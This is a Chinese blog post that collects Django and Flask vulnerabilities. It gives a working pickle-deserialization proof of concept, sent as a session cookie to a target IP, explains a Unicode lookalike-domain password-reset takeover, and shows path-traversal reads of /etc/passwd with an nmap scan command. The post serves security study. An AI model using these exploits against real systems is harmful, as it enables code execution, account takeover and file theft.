Django及Flask漏洞合集

最新推荐文章于 2024-06-15 16:41:28 发布
最新推荐文章于 2024-06-15 16:41:28 发布
阅读量3.3k 收藏 2
点赞数
分类专栏: 框架漏洞 文章标签: python 框架漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48985780/article/details/119817170
版权

Django漏洞

Django任意代码执行

poc:

  1. import os

  2. os.environ.setdefault('DJANGO_SETTINGS_MODULE','settings')

  3. from django.conf import settings

  4. from django.core import signing

  5. from django.contrib.sessions.backends import signed_cookies

  6. class Run(object):

  7. def __reduce__(self):

  8. return (os.system,('touch /tmp/xxlegend.log',))

  9. sess = signing.dumps(Run(), serializer=signed_cookies.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')

  10. print sess

  11. import urllib2

  12. import cookielib

  13. url = 'http://10.24.35.228:8000/favicon.ico'(受攻击的网站)

  14. headers = {'Cookie':'sessionid="%s"' %(sess)}

  15. request = urllib2.Request(url,headers = headers)

  16. response = urllib2.urlopen(request)

  17. print response.read()

Django重置密码漏洞

在浏览器中访问http://127.0.0.1:8000/admin/,看到如下图所示的登录页面,并没有重置密码的功能。

 

Django没有默认开启重置密码功能,从官方文档找到了开启该功能的方法2。我们需要编辑urls.py,引入一些url配置。修改后的urls.py如下所示。

from django.contrib import admin
from django.urls import path
from django.urls import include    # 此行是新增的

urlpatterns = [
    path('admin/', admin.site.urls),
    path('accounts/', include('django.contrib.auth.urls')),    # 此行是新增的
]

然后访问http://127.0.0.1:8000/accounts/password_reset/,看到如下图所示的重置密码页面。

 

根据文档,Django会生成一个可以重置密码的一次性链接,并把这个链接发到用户的邮箱中。如果邮箱地址不存在,Django不会发送邮件,但仍然显示“密码重置链接已经发送”,以避免攻击者探测一个邮箱地址是否为某个用户所有。

输入邮箱i@werner.wiki测试一下,成功收到了密码重置邮件,如下图所示。

 点击其中的链接就可以重置密码了。至此,环境准备完毕。

根据漏洞描述我们知道问题出在Unicode大小写转换。Unicode号称万国码,包含各种语言,有些语言的字母在进行大小写转换时就会出现奇怪的现象。如小写德文字母“ß”转换成大写是“SS”,再转换成小写就变成了“ss”3,大小写转换竟然不可逆,甚至连字符数量都发生了变化。在Python中进行测试截图如下。

大小写转换不可逆的示例

在准备环境时我们填写的用户邮箱是i@werner.wiki,刚好土耳其文和阿塞拜疆文中的字母“ı”转换成大写是英文字母“I”,再转换成小写就变成了英文字母“i”。知道以上信息,攻击者就可以发起攻击。首先注册域名werner.wikı(假设这个域名存在),然后搭建邮件服务器,设置邮箱i@werner.wikı,最后在Django重置密码的表单中填入这个邮箱地址,提交后攻击者就可以收到用户werner的密码重置邮件了。如下图所示,Django的确发送了密码重置邮件,但由于收件邮箱的域名无法解析,所以一直处于发送中的状态。

发出密码重置邮件

勉强算是成功复现了漏洞。这里为何不使用ı@werner.wiki呢?因为@werner.wiki使用的邮件系统不支持地址中包含ı。现实中的攻击者常常也会面临这个问题,实际上攻击者很可能无法任意注册和用户同后缀的邮箱,便只能修改邮箱后缀了。在这个例子中顶级后缀wikı是不存在的。但攻击者任然可能成功攻击,比如被攻击的是xxx@baidu.com,攻击者就可以构造xxx@baıdu.com。从阿里云查询到域名baıdu.com还没有被注册。

注册域名

Django SQL注入漏洞

运行 POC 脚本(CVE-2020-7471.py)查看结果

回到数据库中,发现存在内容了,成功

Django 目录遍历漏洞

在处理GET请求时,我直接取path,然后使用open函数打开path对应的静态文件,并HTTP响应文件的内容。这里出现了一个明显的目录遍历漏洞,对path未做任何判断和过滤。

当我请求http://localhost/etc/passwd时,self.path对应的值是/etc/passwd,而open(‘/etc/passwd’),自然可以读取到passwd文件。

那攻击者为什么要构造/../../../../../../etc/passwd呢? 这是为了防止程序过滤或丢失最左侧的/符号,让起始目录变成脚本当前所在的目录。攻击者使用多个..符号,不断向上跳转,最终到达根/,而根/的父目录就是自己,因此使用再多的..都无差别,最终停留在根/的位置,如此,便可通过绝对路径去读取任意文件。

该漏洞扫描有多种扫描方法,可使用nmap的http-passwd脚本扫描(http://nmap.org/nsedoc/scripts/http-passwd.html),用法:

nmap –script http-passwd –script-args http-passwd.root=/test/ IP地址

Flask漏洞

Flask (SSTI) 模板注入漏洞 

 链接

xzhome
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-7471原理分析及复现
无知亦乐
01-10 1137
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录漏洞简介漏洞影响版本一、漏洞原理分析二、相关说明三、复现总结 漏洞简介 2020年2月3日,Django 官方发布安全通告公布了一个通过StringAgg(分隔符)实现利用的潜在SQL注入漏洞(CVE-2020-7471)。攻击者可通过构造分隔符传递给聚合函数contrib.postgres.aggregates.StringAgg,从而绕过转义符号(\)并注入恶意SQL语句。 漏洞影响版本 一、漏洞原理分析 在 Github
漏洞复现】Django _2.0.8_任意URL跳转漏洞(CVE-2018-14574)
过期的秋刀鱼
11-05 560
Django是一个广泛使用的Python web框架,它有很多方便和强大的功能。但是,像任何其他软件一样,Django也可能存在安全漏洞,这个漏洞Django的CommonMiddleware中可能导致开放重定向。的情况下,Django没做处理,导致浏览器认为目的地址是绝对路径,最终造成任意URL跳转漏洞。​ Django默认配置下,如果匹配上的URL路由中最后一位是。,Django默认会跳转到带/的请求中。Django版本
漏洞盒子/细数Django框架核心历史SQL注入漏洞(上)_详细信息安全笔记
最新发布
程序员三九的博客
06-15 654
0x02 CVE-2019-14234漏洞描述Django 在2019年发布的一个安全更新
框架漏洞-CVE复现-Node.JS+Jquery+Django+Flask
xiaoheizi的博客
07-18 796
Django采用了MTV的框架模式,即模型M,视图V和模版T,使用Django,程序员可以方便、快捷地创建高品质、易维护、数据库驱动的应用程序。访问:/admin/vuln/collection/?描述:Node.js-systeminformation是用于获取各种信息的Node.js模块,在存在命令注入漏洞的版本中,攻击者可以通过未过滤的参数注入payload执行系统命令。添加请求路径:/static/../../../a/../../../../etc/passwd 成功获取敏感信息。
Django -CSRF漏洞
二进制杯莫停的博客
02-08 560
    跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。 1 CSR...
查看Djangoflask版本的方法
09-20
Python的Web开发领域,DjangoFlask都是非常流行的框架。了解它们的版本信息对于开发者来说至关重要,因为这有助于确保你的项目与所依赖的库兼容,同时也可以追踪最新的安全更新和功能改进。以下是如何查看Django...
基于python+Django漏洞扫描系统源码数据库论文.doc
06-28
"基于python+Django漏洞扫描系统源码数据库论文.doc" 本文主要介绍了基于PythonDjango漏洞扫描系统的设计和实现,旨在提高Web应用程序的安全性。系统使用Python技术,结合数据爬虫功能,开发了一款自动化的...
Python优秀项目 基于Flask+MySQL实现的Web漏洞扫描器源码+部署文档+数据资料 信息搜集,漏洞扫描 POC
05-25
Python优秀项目 基于Flask+MySQL实现的Web漏洞扫描器,对输入的域名IP进行全面的信息搜集,漏洞扫描,可自主添加POC源码+部署文档+数据资料.zip 1、代码压缩包内容 代码的项目文件 部署文档文件 2、代码运行版本 ...
基于Python的自动代理Web漏洞扫描器的设计与实现.docx
11-03
使用场景及目标:本资源适用于学生在进行毕业论文写作时,提供了基于Python类的研究方向的指导和支持。通过学习本资源,学生将能够理解Python类的基本原理和应用,掌握相关的研究方法和工具,以及撰写高质量毕业论文...
python128web漏洞挖掘技术的研究_django.zip
07-19
同时,Python拥有丰富的开源库和框架,如DjangoFlask、OpenCV等,为项目开发提供了强大的支持。 这些项目的开发旨在为用户提供便捷、智能的服务和功能。Python语言具备广泛的应用领域,从机器学习、自然语言处理...
python框架漏洞
weixin_68408599的博客
12-10 1352
此博客讲述的是基于python框架的各种漏洞复现以及原理,包括sql注入以及ssti模板注入进行复现的过程,以及造成漏洞形成的粗略原理,靶场环境来自vulhub。
网络安全测试中的跨站点脚本攻击(XSS):PythonFlaskSecurity实现跨站脚本攻击测试
禅与计算机程序设计艺术
07-04 4033
作者:禅与计算机程序设计艺术 《33. 网络安全测试中的跨站点脚本攻击(XSS):PythonFlask-Security实现跨站脚本攻击测试》 引言
python框架漏洞_Django框架的一些漏洞
weixin_39642761的博客
12-14 757
首先我们先来了解一下python中的序列号模板 pickle 这里以一段代码为例子import base64import pickleclass cmd(object):def __reduce__(self):import osreturn (os.system, ('whoami', ))sersize=base64.b64encode(pickle.dumps(cmd()))print se...
Django debug page XSS漏洞(CVE-2017-12794)
EC_Carrot的博客
05-25 248
漏洞简介 DjangoDjango软件基金会的一套基于Python语言的开源Web应用框架。该框架包括面向对象的映射器、视图系统、模板系统等。 Django 1.10.8之前的版本和1.11.5之前的1.11.x版本中的Technical 500 Template存在安全漏洞,该漏洞源于程序没有正确的过滤用户提交的输入。远程攻击者可利用该漏洞在浏览器中执行任意脚本代码。 漏洞详细 具体详细过程可以参考:https://vulhub.org/#/environments/django/CVE-2017-12
利用漏洞django-cve_2019_14234
MGwhhyq的博客
05-13 823
步骤如下: 一,爆破密码 1,打开链接输入用户名:admin密码随便 2,打开burp设置代理后进行抓包 3,对用户名和密码选中右键点击选项一,进入lntruder页面,点击payload,打开load,使用弱密码文件进行爆破 4,结果中对于status列中位302的选项即为密码 二,打开链接 1,打开链接。 2,在网址后方输入admin后单击回车。 3,进入后在users选项上单击add添加用户 4,输入用户名和密码。 5,输入个人信息。 ...
Django REST Framework——6. 认证、权限、限流、过滤、排序及异常处理
花城的博客
12-21 1513
文章目录一、认证(Authentication)1.1 身份认证的流程1.2 自定义认证类1.3 设置认证方案二、权限(Permissions)2.1 权限检查流程2.2 对象级别的权限2.3 自定义权限补充说明2.4 设置权限三、限流(Throttling)3.1 限流检查流程3.2 内置限流3.2.1 AnonRateThrottle3.2.2 UserRateThrottle3.3 设置限流四、过滤(Filtering)4.1 根据当前用户进行过滤4.2 根据URL进行过滤4.3 使用第三方djang
Django的Secret Key泄漏导致的命令执行实践
3569
02-19 4219
http://www.polaris-lab.com/index.php/archives/426/0x01 Secret Key的用途和泄漏导致的攻击面Secret Key主要用于加密、签名,下面是官方文档的说明:The secret key is used for:All sessions if you are using any other session backend thandjang...
Vulhub漏洞复现之Django (小于2.0.8)任意url跳转漏洞(CVE-2018-14574)
来到了学渣的博客
01-20 2719
我是啊锋,一个努力的学渣,作为一个刚进入安全大门的小白,我希望能把自己所学到的东西总结出来,分享到博客上,可以一起进步,一起交流,一起学习。 前文: 名字雷同但差个n的两种类型漏洞环境靶机:vulnhub与vulhub的区别 Vulhub漏洞复现之Dns域传送漏洞 什么是任意url跳转漏洞: 服务端未对传入的跳转url变量进行检查和控制,可能导致可恶意构造任意一个恶意地址,诱导用户跳转到恶意网...
去掉django rest framework强制的csrf检查
cyan-blue
07-25 4151
近期的项目,前端的js是在localhost上跑的,然后向我们后端的开发服务器进行请求。但是突然前端说所有的post请求都报csrf校验错误了,甚是奇怪,之前为了开发方便已经把django的csrf middleware注释掉了啊,为什么还会错误,由于返回值格式还是django rest的通用格式,肯定问题是出在这里面,于是翻了一下它的源代码看了看。from django.middleware.cs
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值